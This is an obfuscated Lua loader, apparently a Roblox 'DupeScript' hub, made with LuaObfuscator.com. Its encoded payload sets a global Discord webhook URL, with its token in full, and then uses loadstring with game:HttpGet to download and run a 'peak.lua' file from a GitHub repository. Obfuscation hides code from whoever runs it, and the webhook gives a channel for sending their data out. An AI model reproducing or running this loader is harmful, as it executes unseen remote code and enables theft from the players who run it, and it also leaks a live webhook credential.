--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v70=v2(v0(v30,16));if v19 then local v78=v5(v70,v19);v19=nil;return v78;else return v70;end end end);local function v20(v31,v32,v33)if v33 then local v71=0 -0 ;local v72;while true do if (v71==(0 -0)) then v72=(v31/((3 -1)^(v32-1)))%((4 -2)^(((v33-(620 -((2192 -(1523 + 114)) + 64))) -(v32-((838 + 94) -(857 + 74)))) + (569 -(367 + 201)))) ;return v72-(v72%1) ;end end else local v73=(1321 -394) -((1279 -(68 + 997)) + 713) ;local v74;while true do if (v73==(0 + 0)) then v74=2^(v32-(1 + 0)) ;return (((v31%(v74 + v74))>=v74) and (878 -(282 + 595))) or 0 ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 + 0 ;local v36;local v37;while true do if ((1 + 0)==v35) then return (v37 * ((1706 -(67 + 113)) -(226 + 766 + 278))) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;v35=351 -(87 + 263) ;end end end local function v23()local v38=0 -(0 -0) ;local v39;local v40;local v41;local v42;while true do if (v38==(2 -1)) then return (v42 * 16777216) + (v41 * (47703 + 17833)) + (v40 * (1253 -(915 + 82))) + v39 ;end if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (11 -(17 -9)) );v18=v18 + ((167 + 789) -(802 + 150)) ;v38=2 -1 ;end end end local function v24()local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(0 -0)) then v44=v23();v45=v23();v43=1 + 0 ;end if (v43==3) then if (v48==(791 -(368 + 423))) then if (v47==(0 -0)) then return v49 * ((1098 -(1020 + 60)) -(10 + 8)) ;else local v100=0;while true do if (v100==(0 -0)) then v48=443 -(416 + 26) ;v46=0 -0 ;break;end end end elseif (v48==2047) then return ((v47==(0 + 0)) and (v49 * ((1 -0)/(438 -(145 + 293))))) or (v49 * NaN) ;end return v8(v49,v48-(1453 -(44 + 386)) ) * (v46 + (v47/(2^(1538 -(998 + 488))))) ;end if (v43==(1 + 1)) then v48=v20(v45,18 + 3 ,803 -(201 + (1994 -(630 + 793))) );v49=((v20(v45,1170 -((392 -276) + 1022) )==(4 -3)) and  -(1 + (0 -0))) or ((2 + 1) -2) ;v43=10 -7 ;end if (v43==(860 -(814 + 45))) then v46=3 -2 ;v47=(v20(v45,2 -1 ,2 + 18 ) * ((1 + 1)^(917 -((2008 -(760 + 987)) + 624)))) + v44 ;v43=3 -1 ;end end end local function v25(v50)local v51=1913 -(1789 + 124) ;local v52;local v53;while true do if (v51==(767 -(745 + 21))) then v52=v3(v16,v18,(v18 + v50) -(1 + 0) );v18=v18 + v50 ;v51=2;end if (v51==(0 -0)) then v52=nil;if  not v50 then local v95=0 -0 ;while true do if (v95==0) then v50=v23();if (v50==((1413 -(447 + 966)) + 0)) then return "";end break;end end end v51=1 + 0 ;end if (v51==(1058 -((1904 -(1703 + 114)) + 968))) then return v6(v53);end if (v51==(8 -6)) then v53={};for v79=1 + 0 , #v52 do v53[v79]=v2(v1(v3(v52,v79,v79)));end v51=(707 -(376 + 325)) -(8 -5) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v54==2) then v59=nil;v60=nil;v54=3;end if (v54==3) then v61=nil;v62=nil;v54=1 + 3 ;end if (v54==0) then v55=0 -0 ;v56=nil;v54=1853 -(973 + 879) ;end if (v54==4) then while true do if (v55~=(1 + 0)) then else local v98=0 -0 ;while true do if (v98==(754 -(239 + 514))) then v55=1 + 1 ;break;end if ((1329 -(797 + 532))==v98) then v58=nil;v59=nil;v98=1 + 0 ;end end end if (v55~=(0 + 0)) then else v56=0 -0 ;v57=nil;v55=1;end if (v55~=(1205 -(373 + 829))) then else v62=nil;while true do local v101=0;local v102;local v103;while true do if (v101==1) then while true do if (v102~=0) then else v103=731 -(476 + 255) ;while true do if ((1131 -(369 + 761))~=v103) then else if (v56==0) then local v130=0;while true do if (v130==(0 + 0)) then v57={};v58={};v130=1;end if (v130~=1) then else v59={};v56=1;break;end end end if (v56==2) then local v131=0 -0 ;local v132;local v133;while true do if (v131==(0 -0)) then v132=0;v133=nil;v131=1;end if (v131~=(239 -(64 + 174))) then else while true do if (v132==0) then v133=0 + 0 ;while true do if (v133==0) then local v168=0;local v169;while true do if (v168~=0) then else v169=0;while true do if (v169~=1) then else v133=1 -0 ;break;end if (0==v169) then local v181=336 -(144 + 192) ;while true do if (1==v181) then v169=1;break;end if (v181~=0) then else for v187=1,v61 do local v188=216 -(42 + 174) ;local v189;local v190;local v191;local v192;while true do if (v188~=(0 + 0)) then else v189=0 + 0 ;v190=nil;v188=1 + 0 ;end if (v188~=1) then else v191=nil;v192=nil;v188=1506 -(363 + 1141) ;end if (v188~=(1582 -(1183 + 397))) then else while true do if ((2 -1)~=v189) then else v192=nil;while true do if (v190==1) then if (v191==1) then v192=v21()~=(0 + 0) ;elseif (v191==2) then v192=v24();elseif (v191==(3 + 0)) then v192=v25();end v62[v187]=v192;break;end if (v190~=(1975 -(1913 + 62))) then else local v207=0 + 0 ;local v208;local v209;while true do if (1~=v207) then else while true do if (v208==0) then v209=0 -0 ;while true do if (v209==(1933 -(565 + 1368))) then local v223=0 -0 ;while true do if (v223~=1) then else v209=1;break;end if (0==v223) then local v228=1661 -(1477 + 184) ;while true do if ((0 -0)==v228) then v191=v21();v192=nil;v228=1 + 0 ;end if ((857 -(564 + 292))==v228) then v223=1;break;end end end end end if (v209~=(1 -0)) then else v190=1;break;end end break;end end break;end if (v207~=(0 -0)) then else v208=0;v209=nil;v207=1;end end end end break;end if (v189==(304 -(244 + 60))) then local v202=0 + 0 ;while true do if (v202~=(476 -(41 + 435))) then else v190=1001 -(938 + 63) ;v191=nil;v202=1;end if ((1 + 0)~=v202) then else v189=1;break;end end end end break;end end end v60[1128 -(936 + 189) ]=v21();v181=1;end end end end break;end end end if (v133~=(1 + 0)) then else for v175=1,v23() do local v176=0;local v177;local v178;local v179;local v180;while true do if (v176==(1614 -(1565 + 48))) then v179=nil;v180=nil;v176=2;end if (v176~=(0 + 0)) then else v177=1138 -(782 + 356) ;v178=nil;v176=1;end if (v176==(269 -(176 + 91))) then while true do if (1==v177) then v180=nil;while true do if (v178~=0) then else local v193=0;while true do if (v193==(2 -1)) then v178=1;break;end if (v193==0) then v179=0 -0 ;v180=nil;v193=1093 -(975 + 117) ;end end end if (v178~=(1876 -(157 + 1718))) then else while true do if (v179==0) then v180=v21();if (v20(v180,1 + 0 ,3 -2 )==(0 -0)) then local v197=1018 -(697 + 321) ;local v198;local v199;local v200;local v201;while true do if (v197==(2 -1)) then local v203=0;local v204;while true do if (v203~=(0 -0)) then else v204=0;while true do if (v204~=(2 -1)) then else v197=2;break;end if (v204~=(0 + 0)) then else local v222=0 -0 ;while true do if (1==v222) then v204=2 -1 ;break;end if (v222==(1227 -(322 + 905))) then v200=nil;v201=nil;v222=1;end end end end break;end end end if (v197~=(611 -(602 + 9))) then else local v205=1189 -(449 + 740) ;while true do if (v205==0) then v198=0;v199=nil;v205=1;end if (v205~=(873 -(826 + 46))) then else v197=1;break;end end end if (v197~=(949 -(245 + 702))) then else while true do if ((0 -0)==v198) then local v210=0;local v211;local v212;while true do if (v210~=0) then else v211=0;v212=nil;v210=1;end if (v210==(1 + 0)) then while true do if (v211==(1898 -(260 + 1638))) then v212=440 -(382 + 58) ;while true do if (v212~=(0 -0)) then else local v224=0 + 0 ;local v225;while true do if ((0 -0)==v224) then v225=0;while true do if (v225~=(0 -0)) then else local v234=0;while true do if (v234==1) then v225=1206 -(902 + 303) ;break;end if (v234~=(0 -0)) then else v199=v20(v180,2,3);v200=v20(v180,4,14 -8 );v234=1;end end end if (v225==1) then v212=1 + 0 ;break;end end break;end end end if ((1691 -(1121 + 569))~=v212) then else v198=1;break;end end break;end end break;end end end if ((216 -(22 + 192))~=v198) then else local v213=683 -(483 + 200) ;local v214;local v215;while true do if (v213~=1) then else while true do if (v214~=0) then else v215=1463 -(1404 + 59) ;while true do if (v215~=0) then else local v226=0 -0 ;while true do if (v226==(0 -0)) then if (v20(v200,1,1)==1) then v201[767 -(468 + 297) ]=v62[v201[564 -(334 + 228) ]];end if (v20(v200,2,6 -4 )==1) then v201[3]=v62[v201[3]];end v226=2 -1 ;end if (v226==1) then v215=1;break;end end end if (v215==1) then v198=5 -2 ;break;end end break;end end break;end if (v213==(0 + 0)) then v214=236 -(141 + 95) ;v215=nil;v213=1 + 0 ;end end end if (v198~=(7 -4)) then else if (v20(v200,6 -3 ,1 + 2 )~=(2 -1)) then else v201[3 + 1 ]=v62[v201[3 + 1 ]];end v57[v175]=v201;break;end if (v198==(1 -0)) then local v217=0;local v218;local v219;while true do if (v217~=(1 + 0)) then else while true do if ((163 -(92 + 71))==v218) then v219=0 + 0 ;while true do if (v219==(0 -0)) then local v227=765 -(574 + 191) ;while true do if (v227==(1 + 0)) then v219=1;break;end if (v227==(0 -0)) then local v229=0 + 0 ;while true do if (v229~=0) then else v201={v22(),v22(),nil,nil};if (v199==(1790 -(573 + 1217))) then local v235=0 -0 ;local v236;local v237;while true do if (v235~=(0 + 0)) then else v236=0;v237=nil;v235=1 -0 ;end if (v235~=1) then else while true do if (v236~=0) then else v237=939 -(714 + 225) ;while true do if (v237~=0) then else v201[3]=v22();v201[4]=v22();break;end end break;end end break;end end elseif (v199==(2 -1)) then v201[3 -0 ]=v23();elseif (v199==2) then v201[3]=v23() -((1 + 1)^16) ;elseif (v199==3) then local v240=0 -0 ;local v241;while true do if (v240~=(806 -(118 + 688))) then else v241=0;while true do if (v241~=0) then else v201[3]=v23() -(2^16) ;v201[4]=v22();break;end end break;end end end v229=49 -(25 + 23) ;end if (v229~=1) then else v227=1;break;end end end end end if (v219~=(1 + 0)) then else v198=1888 -(927 + 959) ;break;end end break;end end break;end if (v217~=0) then else v218=0 -0 ;v219=nil;v217=733 -(16 + 716) ;end end end end break;end end end break;end end break;end end break;end if (v177==0) then local v184=0 -0 ;while true do if (v184~=(97 -(11 + 86))) then else v178=0 -0 ;v179=nil;v184=286 -(175 + 110) ;end if (v184~=1) then else v177=1;break;end end end end break;end end end v56=3;break;end end break;end end break;end end end break;end if ((0 -0)~=v103) then else local v110=0 -0 ;local v111;while true do if (v110==(1796 -(503 + 1293))) then v111=0 -0 ;while true do if (v111==1) then v103=1 + 0 ;break;end if (v111~=(1061 -(810 + 251))) then else local v161=0;while true do if (v161==(1 + 0)) then v111=1 + 0 ;break;end if (v161~=0) then else if (v56==(3 + 0)) then local v170=0;local v171;local v172;while true do if (0~=v170) then else v171=533 -(43 + 490) ;v172=nil;v170=734 -(711 + 22) ;end if (v170~=(3 -2)) then else while true do if (v171==(859 -(240 + 619))) then v172=0;while true do if (v172~=(0 + 0)) then else local v186=0 -0 ;while true do if (v186~=(0 + 0)) then else for v195=1,v23() do v58[v195-(1745 -(1344 + 400)) ]=v28();end return v60;end end end end break;end end break;end end end if ((406 -(255 + 150))~=v56) then else local v173=0 + 0 ;local v174;while true do if (v173==(0 + 0)) then v174=0;while true do if (v174~=(4 -3)) then else v62={};v56=6 -4 ;break;end if (v174~=0) then else local v182=0;local v183;while true do if (v182==(1739 -(404 + 1335))) then v183=406 -(183 + 223) ;while true do if (1==v183) then v174=1 -0 ;break;end if (v183==0) then local v194=0 + 0 ;while true do if (v194==(0 + 0)) then v60={v57,v58,nil,v59};v61=v23();v194=1 + 0 ;end if ((339 -(118 + 220))==v194) then v183=1 + 0 ;break;end end end end break;end end end end break;end end end v161=450 -(108 + 341) ;end end end end break;end end end end break;end end break;end if (v101==0) then v102=0;v103=nil;v101=1 + 0 ;end end end break;end if (v55~=2) then else local v99=0 -0 ;while true do if (v99~=1) then else v55=3;break;end if (v99~=(1493 -(711 + 782))) then else v60=nil;v61=nil;v99=1 -0 ;end end end end break;end if ((470 -(270 + 199))~=v54) then else v57=nil;v58=nil;v54=1 + 1 ;end end end local function v29(v63,v64,v65)local v66=0;local v67;local v68;local v69;while true do if (v66==1) then v69=v63[3];return function(...)local v81=v67;local v82=v68;local v83=v69;local v84=v27;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v96=0,v89 do if (v96>=v83) then v87[v96-v83 ]=v88[v96 + 1 ];else v91[v96]=v88[v96 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do local v97=0;while true do if (v97==1) then if (v94<=9) then if (v94<=4) then if (v94<=1) then if (v94==0) then do return;end else do return;end end elseif (v94<=2) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end elseif (v94>3) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end else local v135=0;local v136;local v137;local v138;local v139;while true do if (v135==1) then v86=(v138 + v136) -1 ;v139=0;v135=2;end if (v135==0) then v136=v93[2];v137,v138=v84(v91[v136](v13(v91,v136 + 1 ,v93[3])));v135=1;end if (v135==2) then for v162=v136,v86 do v139=v139 + 1 ;v91[v162]=v137[v139];end break;end end end elseif (v94<=6) then if (v94==5) then local v112=0;local v113;local v114;while true do if (v112==1) then v91[v113 + 1 ]=v114;v91[v113]=v114[v93[4]];break;end if (v112==0) then v113=v93[2];v114=v91[v93[3]];v112=1;end end else v91[v93[2]][v93[3]]=v93[4];end elseif (v94<=7) then v91[v93[2]]=v65[v93[3]];elseif (v94>8) then local v140=0;local v141;local v142;local v143;local v144;while true do if (v140==1) then v86=(v143 + v141) -1 ;v144=0;v140=2;end if (v140==2) then for v165=v141,v86 do v144=v144 + 1 ;v91[v165]=v142[v144];end break;end if (v140==0) then v141=v93[2];v142,v143=v84(v91[v141](v13(v91,v141 + 1 ,v93[3])));v140=1;end end else v85=v93[3];end elseif (v94<=14) then if (v94<=11) then if (v94>10) then local v119=v93[2];v91[v119]=v91[v119](v13(v91,v119 + 1 ,v86));else local v121=v93[2];local v122=v91[v93[3]];v91[v121 + 1 ]=v122;v91[v121]=v122[v93[4]];end elseif (v94<=12) then v91[v93[2]][v93[3]]=v93[4];elseif (v94>13) then v85=v93[3];else v91[v93[2]]=v65[v93[3]];end elseif (v94<=16) then if (v94>15) then v91[v93[2]]();else v91[v93[2]]();end elseif (v94<=17) then v91[v93[2]]=v93[3];elseif (v94>18) then v91[v93[2]]=v93[3];else local v151=v93[2];v91[v151]=v91[v151](v13(v91,v151 + 1 ,v86));end v85=v85 + 1 ;break;end if (v97==0) then v93=v81[v85];v94=v93[1];v97=1;end end end end;end if (v66==0) then v67=v63[1];v68=v63[2];v66=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F47030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313230352O323330333935323931363439302F765465454D6D526D34727765334331475065396462472O6C58706E6D726E4442417033434B6A506A6C36782O396158554E547444436A5A49374F754B745F393341723866030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F6D61696E2F7065616B2E6C756103083O00557365726E616D65030C3O006A736A73676A2O737768656803073O004875624E616D65030A3O004475706553637269707400163O0012113O00013O0026023O000D0001000200040E3O000D000100120D000100033O00300C00010004000500120D000100063O00120D000200073O002005000200020008001211000400094O0003000200044O001200013O00022O000F00010001000100040E3O001500010026023O00010001000100040E3O0001000100120D000100033O00300C0001000A000B00120D000100033O00300C0001000C000D0012113O00023O00040E3O000100016O00017O00",v9(),...);end
